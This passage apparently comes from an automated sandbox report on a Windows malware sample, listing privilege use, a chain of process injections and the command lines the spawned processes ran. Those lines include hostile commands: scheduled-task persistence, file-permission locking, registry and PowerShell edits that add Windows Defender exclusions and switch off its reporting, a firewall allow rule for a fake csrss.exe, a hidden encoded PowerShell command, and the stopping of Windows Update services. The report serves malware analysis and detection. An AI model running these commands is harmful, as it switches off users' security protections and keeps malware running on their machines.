Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3040 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 2220 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 1876 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 1876 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 1876 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 1876 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 1876 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 1876 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 1876 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 2324 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 2324 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 2324 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 2324 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 2324 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 2324 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 2324 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 2772 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 2772 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 2772 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 2772 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 2772 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 2772 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 2772 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2012 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2772 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 2772 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 2772 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 2772 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 2772 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 2772 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 2772 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 2324 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 2324 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 2324 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 2324 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 2324 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 2324 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 2324 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 1876 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe
PID 1876 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe
PID 1876 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe

"C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C17B.tmp\C17C.tmp\C17D.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2280 CREDAT:275457 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2280 CREDAT:472074 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

C:\Users\Admin\AppData\Local\Temp\FB51.exe

C:\Users\Admin\AppData\Local\Temp\FB51.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2280 CREDAT:14693378 /prefetch:2

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\FE3E.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\18A.exe

C:\Users\Admin\AppData\Local\Temp\18A.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\D5D.exe

C:\Users\Admin\AppData\Local\Temp\D5D.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 268

C:\Users\Admin\AppData\Local\Temp\1441.exe

C:\Users\Admin\AppData\Local\Temp\1441.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\taskeng.exe

taskeng.exe {A2D546EA-EA5E-4582-871C-C0A44288BF9D} S-1-5-21-3618187007-3650799920-3290345941-1000:BPDFUYWR\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\9D8D.exe

C:\Users\Admin\AppData\Local\Temp\9D8D.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\B2E2.exe

C:\Users\Admin\AppData\Local\Temp\B2E2.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\C135.exe

C:\Users\Admin\AppData\Local\Temp\C135.exe

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp" /SL4 $502EC "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Users\Admin\AppData\Local\Temp\F753.exe

C:\Users\Admin\AppData\Local\Temp\F753.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Users\Admin\AppData\Local\Temp\317.exe

C:\Users\Admin\AppData\Local\Temp\317.exe

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "goNnmaXQx" /SC once /ST 02:30:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "goNnmaXQx"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231025045428.log C:\Windows\Logs\CBS\CbsPersist_20231025045428.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "goNnmaXQx"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

